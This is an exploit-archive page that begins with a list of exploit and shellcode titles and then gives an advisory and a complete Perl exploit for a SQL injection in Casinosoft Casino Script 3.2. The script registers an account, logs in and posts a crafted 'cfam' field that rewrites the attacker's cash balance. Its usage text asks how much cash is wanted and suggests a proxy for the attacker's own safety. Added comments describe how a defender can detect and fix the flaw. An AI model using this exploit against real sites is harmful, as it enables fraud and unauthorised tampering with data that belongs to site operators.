
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 
bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
source: https://www.securityfocus.com/bid/20646/info
Casinosoft Casino Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
Version 3.2 is vulnerable; other versions may also be affected.
#!/usr/bin/perl
# Proof-of-concept client for the SQL injection in Casinosoft ("Massvet")
# Casino Script 3.2 described in the advisory text (securityfocus BID 20646).
#
# Flow: register an account (reg.php), log in (lobby/login_proc.php), then
# submit a profile update (lobby/config.php) whose "cfam" field contains SQL
# text. The script runs without `use strict` / `use warnings`; every variable
# below is a package global.
#
# Defender's view: only the third request carries the injection. Its "cfam"
# value starts with a single quote, adds `cash='...' where login='...'`, and
# ends with the comment opener `/*`. That changes the query only if the server
# places the field inside a quoted SQL string without escaping or bound
# parameters -- the condition the advisory describes. Such a parameter value in
# a POST to lobby/config.php is the pattern to look for in request logs or to
# block at a WAF; the durable fix is server-side parameterised queries.

## Massvet ........ ...... - ......... .......... .......!
## ........ ...... 3.2, ........ ..... ......, . .......... magicquotes
## ......... .. ...... 3.2
##
## written by G1UK
## CFTeam
# NOTE(review): the dotted runs above appear to be non-ASCII text lost in
# extraction; the second line mentions version 3.2 and "magicquotes",
# presumably PHP's magic_quotes setting -- confirm against the original file.

use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;

# Getopt::Std stores each switch in a package variable $opt_<letter>;
# all six switches take a value.
getopts("h:d:l:p:c:x:");

# -d falls back to the site root and -x to "no proxy"; the rest have no default.
$host = $opt_h;
$dir = $opt_d || '/';
$login = $opt_l;
$pass = $opt_p;
$cash = $opt_c;
$proxy = $opt_x || '';
logo();

# host, login, password and cash are mandatory; help() prints usage and exits.
if(!$host||!$login||!$pass||!$cash) { help(); }

# Echo the chosen settings (the password is printed in clear text).
print "=) server : $host \r\n";
print "=) casino dir : $dir \r\n";
print "=) login : $login \r\n";
print "=) password : $pass \r\n";
print "=) cash : $cash \r\n";
print "\r\n";

# One user agent with a cookie jar, so cookies set by the site are kept and
# sent again on the later requests.
$cook = LWP::UserAgent->new() or die;
$cookie = HTTP::Cookies->new();
$cook->cookie_jar( $cookie );
# Base address without scheme: host immediately followed by the directory.
$url=$host.''.$dir;
# Only plain-http traffic is routed through the proxy, and only if -x was given.
$cook->proxy('http'=>'http://'.$proxy) if $proxy;

# Step 1: create the account. $res is never inspected, so "Registering OK"
# is printed regardless of how the server answered.
# NOTE(review): the dotted "submit" values here and in step 2 look like
# non-ASCII button labels lost in extraction.
printf "Registering =)\r\n";
$res = $cook->post('http://'.$url.'reg.php',
[
"r_login" => "$login",
"r_pass" => "$pass",
"r_email" => "1",
"send" => "1",
"submit"=> "........."
]);
print "Registering OK\r\n";

# Step 2: log in with the same credentials.
# NOTE(review): $sid is not assigned anywhere in the visible script, and the
# "Cookie" pair sits in the form-field list, so it is posted as an ordinary
# field; the cookie jar is what would carry any session cookie.
print "Enter =)\r\n";
$res = $cook->post('http://'.$url.'lobby/login_proc.php',
[
"log" => "$login",
"psw" => "$pass",
"send" => "1",
"submit"=> ".....",
"Cookie" => "PHPSESSID=".$sid
]);
print "Enter OK\r\n";

# Step 3: profile update. "cpass" repeats the password, "cname" is empty, and
# "cfam" is the injected value built from -c and -l (see the header note).
print "Edit you cash =))\r\n";
$res = $cook->post('http://'.$url.'lobby/config.php',
[
"cpass" => "$pass",
"cname" => "",
"cfam" => "',cash='".$cash."' where login='".$login."'/*",
"send" => "1",
"Cookie" => "PHPSESSID=".$sid
]);
# Printed unconditionally: the script never verifies that anything changed.
print "Check out you cash =)\r\n";
# Print the start-up banner: a rule line, the title line, and the rule again.
# Takes no arguments; output goes to the currently selected handle (STDOUT).
sub logo()
{
    my $rule = "<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\r\n";

    # The title string contains a literal line break, so its continuation
    # must stay at column 0.
    my $title = "Massvet internet casino v3.2 sql injection cash exploit by
CFTeam\r\n";

    print $rule;
    print $title;
    print $rule;
}
# Show the command-line usage text, then end the process.
# Reached from the main script when a mandatory switch (-h, -l, -p, -c) is missing.
sub help()
{
    # Some entries contain a literal line break, so their continuation
    # lines must stay at column 0.
    my @usage_text = (
        "CFteam.pl -h <host> -d [dir] -l <login> -p <password> -c <cash>
-x [proxy]\r\n\r\n",
        "<host> - Host where cazino installed for example -
www.massvet.ru\r\n",
        "[dir] - Directory, where cazino is installed /cazino/ for
example\r\n",
        "<login> - User name for registrate \r\n",
        "<password> - Password for registrate \r\n",
        "<cash> - How much you need? (00.00)\r\n",
        "[proxy] - For you safety \r\n",
    );

    # One print per entry, in order, exactly as listed.
    print $_ for @usage_text;
    exit();
}